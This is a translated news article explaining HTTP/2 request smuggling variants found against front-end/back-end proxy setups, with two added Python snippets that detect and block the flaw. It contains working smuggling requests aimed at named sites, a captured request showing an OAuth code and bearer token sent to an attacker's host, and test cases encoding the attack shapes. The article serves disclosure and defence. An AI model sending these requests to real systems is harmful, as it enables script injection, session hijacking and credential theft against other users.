New attack on front-end/back-end systems that allows wedging into other users' requests

Web systems in which the front end accepts connections over HTTP/2 and forwards them to the back end over HTTP/1.1 have been shown to be exposed to a new variant of the “HTTP Request Smuggling” attack, which allows, by sending specially crafted client requests, wedging into the content of requests from other users that are processed in the same stream between the front end and the back end. The attack can be used to inject malicious JavaScript code into a session with a legitimate website, bypass access-restriction systems and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other setups in which requests are relayed from a front end to a back end. The author of the research demonstrated the possibility of attacking the systems of Netflix, Verizon, Bitbucket, Netlify CDN and Atlassian, and received 56 thousand dollars through vulnerability bounty programs. The problem has also been confirmed in F5 Networks products. The problem partially affects mod_proxy in the Apache http server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified of the problem in early May and given 3 months to fix it). In nginx, the ability to specify the “Content-Length” and “Transfer-Encoding” headers at the same time was blocked in the latest release (1.21.1). Attack tools have already been added to the Burp toolkit and are available in the form of the Turbo Intruder extension.

The principle behind the new method of wedging requests into traffic is similar to the vulnerability identified by the same researcher two years ago, which was limited to front ends that accept requests over HTTP/1.1. Recall that in a front-end/back-end scheme, client requests are received by an additional node, the front end, which establishes a long-lived TCP connection with the back end, which processes the requests directly. Over this shared connection, requests from different users are usually forwarded one after another in a chain, separated by means of the HTTP protocol.

The classic “HTTP Request Smuggling” attack was based on the fact that the front end and the back end interpret the HTTP headers “Content-Length” (determines the total size of the data in the request) and “Transfer-Encoding: chunked” (allows the data to be transferred in parts) differently. For example, if the front end supports only “Content-Length” but ignores “Transfer-Encoding: chunked”, an attacker can send a request containing both the “Content-Length” and “Transfer-Encoding: chunked” headers, where the size in “Content-Length” does not match the size of the chunked chain. In this case, the front end will process and forward the request according to “Content-Length”, while the back end will wait for the block to complete based on “Transfer-Encoding: chunked”, and the remaining tail of the attacker's request will end up at the beginning of someone else's request sent next.

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol and operates on data blocks of a size declared in advance. However, HTTP/2 uses pseudo-headers that correspond to ordinary HTTP headers. When it talks to the back end over HTTP/1.1, the front end translates these pseudo-headers into the analogous HTTP/1.1 headers. The problem is that the back end makes its decisions about parsing the stream based on the HTTP headers set by the front end, without having any information about the framing of the original request.

In particular, the “content-length” and “transfer-encoding” values can be transmitted as pseudo-headers, even though they are not used in HTTP/2, since the size of all data is determined in a separate field. However, during the conversion of an HTTP/2 request into HTTP/1.1, these headers are carried over and can mislead the back end. There are two main variants of the attack: H2.TE and H2.CL, in which the back end is misled by an incorrect transfer-encoding value or by a content-length value that does not correspond to the real size of the request body received by the front end over HTTP/2.


As an example of an H2.CL attack, an incorrect size is specified in the content-length pseudo-header when sending an HTTP/2 request to Netflix. This request leads to the analogous HTTP header Content-Length being added when the back end is accessed over HTTP/1.1, but since the size in Content-Length is specified smaller than the real one, part of the data at the tail is processed as the beginning of the next request.

For example, the HTTP/2 request

    :method POST
    :path /n
    :authority www.netflix.com
    content-length 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

will result in the following request being sent to the back end:

    POST /n HTTP/1.1
    Host: www.netflix.com
    Content-Length: 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

Since Content-Length has the value 4, the back end will accept only “abcd” as the request body, and the whole “GET /n HTTP/1.1...” part will be processed as the beginning of the next request, which belongs to another user. Accordingly, the stream becomes desynchronized and, in response to the next request, the result of processing the dummy request is returned. In the case of Netflix, specifying a third-party host in the “Host:” header of the dummy request resulted in the client receiving a “Location: https://02.rs?x.netflix.com/n” response and allowed arbitrary content to be delivered to the client, including running the attacker's JavaScript code in the context of the Netflix site.

The second attack variant (H2.TE) involves substituting the “Transfer-Encoding: chunked” header. The use of the transfer-encoding pseudo-header in HTTP/2 is prohibited by the specification, and requests carrying it are required to be treated as invalid. Despite this, some front-end implementations ignore this requirement and allow the transfer-encoding pseudo-header in HTTP/2, converting it into the analogous HTTP header. If a “Transfer-Encoding” header is present, the back end may treat it as taking priority and split the data piece by piece in “chunked” mode, using blocks of varying size in the format “{size}\r\n{block}\r\n{size}\r\n{block}\r\n0”, regardless of the original framing by total size.

The presence of such a gap was demonstrated using the example of Verizon. The problem concerned the authentication portal and content management system, which is also used on sites such as the Huffington Post and Engadget. For example, the client request over HTTP/2

    :method POST
    :path /identity/XUI
    :authority id.b2b.oath.com
    transfer-encoding chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

resulted in the following HTTP/1.1 request being sent to the back end:

    POST /identity/XUI HTTP/1.1
    Host: id.b2b.oath.com
    Content-Length: 66
    Transfer-Encoding: chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

The back end, in turn, ignored the “Content-Length” header and split the stream based on “Transfer-Encoding: chunked”. In practice, the attack made it possible to redirect user requests to the attacker's own site, including intercepting requests related to OAuth authentication, whose parameters appeared in the Referer header, as well as imitating an authentication session and causing the user's system to send credentials to the attacker's host:

    GET /b2blanding/show/oops HTTP/1.1
    Host: psres.net
    Referer: https://id.b2b.oath.com/?…&code=secret

    GET / HTTP/1.1
    Host: psres.net
    Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sIkIk6…
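The Verizon case comes down to two parsers ending the same request body at different offsets. As an added example (not code from the article or from any vendor it names), the Python check below computes where an HTTP/1.1 body ends under Content-Length framing and under chunked framing, reports the bytes that fall between the two ends, and applies the strict policy of refusing requests that carry both mechanisms. The function names `framing_report` and `accept` are ours, and the sample request is constructed after the back-end request shown above.

```python
# Added illustration, not the article's code: detect framing disagreement in an
# HTTP/1.1 request the way a hardened back end or proxy might before parsing it.
from __future__ import annotations

CRLF = b"\r\n"


def split_head(raw: bytes) -> tuple[dict[str, str], bytes]:
    """Return (lower-cased header map, body bytes) for a raw HTTP/1.1 request."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("request head is incomplete")
    headers: dict[str, str] = {}
    for line in head.split(CRLF)[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers, body


def chunked_body_len(body: bytes) -> int | None:
    """Bytes consumed by a chunked body, up to and including the blank line that
    ends the trailer section. None if the encoding is malformed or incomplete."""
    pos = 0
    while True:
        end = body.find(CRLF, pos)
        if end == -1:
            return None
        try:
            size = int(body[pos:end].split(b";")[0].strip(), 16)  # drop chunk extensions
        except ValueError:
            return None
        pos = end + 2
        if size == 0:
            while True:  # trailer lines, terminated by an empty line
                end = body.find(CRLF, pos)
                if end == -1:
                    return None
                empty = end == pos
                pos = end + 2
                if empty:
                    return pos
        pos += size
        if body[pos:pos + 2] != CRLF:
            return None
        pos += 2


def framing_report(raw: bytes) -> dict:
    """Where the body ends under each framing, and what lies between the two ends."""
    headers, body = split_head(raw)
    cl = headers.get("content-length")
    te = headers.get("transfer-encoding")
    cl_len = int(cl) if cl is not None and cl.isdigit() else None
    te_len = None
    if te is not None and te.split(",")[-1].strip().lower() == "chunked":
        te_len = chunked_body_len(body)
    ends = [n for n in (cl_len, te_len) if n is not None]
    ambiguous = len(ends) == 2 and cl_len != te_len
    # The bytes one parser treats as body and the other as the start of the next request.
    leftover = body[min(ends):max(ends)] if ambiguous else b""
    return {"content_length_framing": cl_len, "chunked_framing": te_len,
            "ambiguous": ambiguous, "leftover": leftover}


def accept(raw: bytes) -> bool:
    """Strict policy: refuse both framings at once (as the article says nginx 1.21.1
    now does), and refuse any body that does not end exactly where the framing says."""
    headers, body = split_head(raw)
    report = framing_report(raw)
    has_cl, has_te = "content-length" in headers, "transfer-encoding" in headers
    if has_cl and has_te:
        return False
    if has_te:
        return report["chunked_framing"] == len(body)
    if has_cl:
        return report["content_length_framing"] == len(body)
    return len(body) == 0


# Constructed sample, modelled on the back-end request in the article (66 body bytes).
SAMPLE = (b"POST /identity/XUI HTTP/1.1\r\nHost: id.b2b.oath.com\r\n"
          b"Content-Length: 66\r\nTransfer-Encoding: chunked\r\n\r\n"
          b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\nContent-Length: 10\r\n\r\nx=")
# Constructed well-formed request for comparison.
CLEAN = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 2\r\n\r\nx="

if __name__ == "__main__":
    for name, req in (("sample", SAMPLE), ("clean", CLEAN)):
        print(name, framing_report(req), "accept:", accept(req))
```

On the sample, Content-Length framing consumes all 66 body bytes while chunked framing stops after the 5-byte terminating chunk, so the 61 bytes starting with `GET /oops` are exactly what a chunked-honouring back end would read as the next request. Checking the two framings against each other, rather than trusting whichever header a given parser prefers, is the property a proxy needs at the HTTP/2 to HTTP/1.1 boundary.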

To attack HTTP/2 implementations that do not allow the transfer-encoding pseudo-header to be specified, another method was proposed, which substitutes the “Transfer-Encoding” header by appending it to another pseudo-header after a newline character (when converted to HTTP/1.1, this produces two separate HTTP headers).

For example, Atlassian Jira and the Netlify CDN (used to serve the Firefox start page for Mozilla) were affected by this problem. In particular, the HTTP/2 request

    :method POST
    :path /
    :authority start.mozilla.org
    foo b\r\n
    transfer-encoding: chunked

    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

caused the following HTTP/1.1 request to be sent to the back end:

    POST / HTTP/1.1\r\n
    Host: start.mozilla.org\r\n
    Foo: b\r\n
    Transfer-Encoding: chunked\r\n
    Content-Length: 71\r\n
    \r\n
    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

Another way of substituting the “Transfer-Encoding” header was to append it to the name of another pseudo-header or to the line carrying the request method. For example, when accessing Atlassian Jira, the pseudo-header name “foo: bar\r\ntransfer-encoding” with the value “chunked” caused the HTTP headers “foo: bar” and “transfer-encoding: chunked” to be added.
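The H2.CL, H2.TE and newline-injection variants described above all depend on the front end carrying unvalidated header material into the HTTP/1.1 request it builds. The Python snippet below is an added illustration, not code from the article or from any of the affected products, of the checks a hardened downgrade step would apply before emitting HTTP/1.1: the declared content-length must equal the DATA payload actually received, transfer-encoding and other connection-specific fields are refused, header names must be lowercase tokens, and neither names nor values may contain CR, LF or NUL. The header-list input format and the names `downgrade` and `is_safe` are assumptions of this example; the sample inputs are constructed after the article's Netflix, Jira and Netlify cases.

```python
# Added illustration, not the article's code: a front-end style HTTP/2 -> HTTP/1.1
# downgrade that validates what it forwards instead of copying headers through.
from __future__ import annotations

import re

CRLF = "\r\n"
# Connection-specific fields that RFC 9113 forbids in HTTP/2; "host" is refused
# too so that :authority is the only source of the HTTP/1.1 Host line.
FORBIDDEN = {"transfer-encoding", "connection", "keep-alive",
             "proxy-connection", "upgrade", "host"}
TOKEN = re.compile(r"[!#$%&'*+.^_`|~0-9a-z-]+")  # lowercase tchar, as HTTP/2 requires
BAD_VALUE = re.compile(r"[\r\n\x00]")


class DowngradeError(ValueError):
    """The HTTP/2 request cannot be expressed unambiguously in HTTP/1.1."""


def check_field(name: str, value: str) -> None:
    # Catches "foo: bar\r\ntransfer-encoding" smuggled in a header *name*.
    if not TOKEN.fullmatch(name):
        raise DowngradeError(f"illegal header name {name!r}")
    if name in FORBIDDEN:
        raise DowngradeError(f"{name} must not be forwarded from HTTP/2")
    # Catches "b\r\ntransfer-encoding: chunked" smuggled in a header *value*.
    if BAD_VALUE.search(value) or not value.isascii() or value != value.strip(" \t"):
        raise DowngradeError(f"illegal characters in value of {name}")


def downgrade(pseudo: dict[str, str], headers: list[tuple[str, str]], body: bytes) -> bytes:
    """Build the HTTP/1.1 request bytes, or raise DowngradeError."""
    try:
        method, path, authority = (pseudo[k] for k in (":method", ":path", ":authority"))
    except KeyError as missing:
        raise DowngradeError(f"missing pseudo-header {missing}") from None
    for part in (method, path, authority):
        if not part or re.search(r"[\r\n\x00 ]", part):
            raise DowngradeError("illegal characters in request line")
    lines = [f"{method} {path} HTTP/1.1", f"Host: {authority}"]
    for name, value in headers:
        check_field(name, value)
        if name == "content-length":
            # H2.CL: the declared length must match the DATA payload we actually got.
            if not value.isdigit() or int(value) != len(body):
                raise DowngradeError(f"content-length {value!r} != {len(body)} body bytes")
            continue  # re-emitted below from the real length
        lines.append(f"{name}: {value}")
    # Always frame by the length we observed; never by a client-supplied header.
    lines.append(f"Content-Length: {len(body)}")
    return (CRLF.join(lines) + CRLF + CRLF).encode("ascii") + body


def is_safe(pseudo: dict[str, str], headers: list[tuple[str, str]], body: bytes) -> bool:
    try:
        downgrade(pseudo, headers, body)
        return True
    except DowngradeError:
        return False


# Constructed inputs modelled on the cases in the article (hypothetical, not captures).
PSEUDO = {":method": "POST", ":path": "/n", ":authority": "www.netflix.com"}
SMUGGLED_TAIL = b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar\r\n"
CASES = {
    "h2.cl": ([("content-length", "4")], SMUGGLED_TAIL),
    "h2.te": ([("transfer-encoding", "chunked")], b"0\r\n\r\n"),
    "crlf-in-value": ([("foo", "b\r\ntransfer-encoding: chunked")], b"0\r\n\r\n"),
    "crlf-in-name": ([("foo: bar\r\ntransfer-encoding", "chunked")], b"0\r\n\r\n"),
    "clean": ([("content-length", "2"), ("foo", "bar")], b"x="),
}

if __name__ == "__main__":
    for label, (hdrs, data) in CASES.items():
        print(f"{label:14} safe={is_safe(PSEUDO, hdrs, data)}")
```

Only the clean case survives; the four attack shapes are rejected at the front end, so the back end never sees a Content-Length it has to reconcile with anything else. Rewriting Content-Length from the observed body length, rather than forwarding the client's value, is the single change that removes the H2.CL class outright.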

The researcher who identified the problem also proposed a request tunneling technique for attacking front ends in which each IP address gets its own connection to the back end and traffic from different users is not mixed. The proposed technique does not allow wedging into other users' requests, but it makes it possible to poison a shared cache in a way that affects the processing of other requests, and allows substitution of the internal HTTP headers used to pass service information from the front end to the back end (for example, when authentication is performed on the front-end side, such headers can carry information about the current user to the back end). As a practical application of the method, cache poisoning made it possible to gain control over pages in the Bitbucket service.

Source: opennet.ru
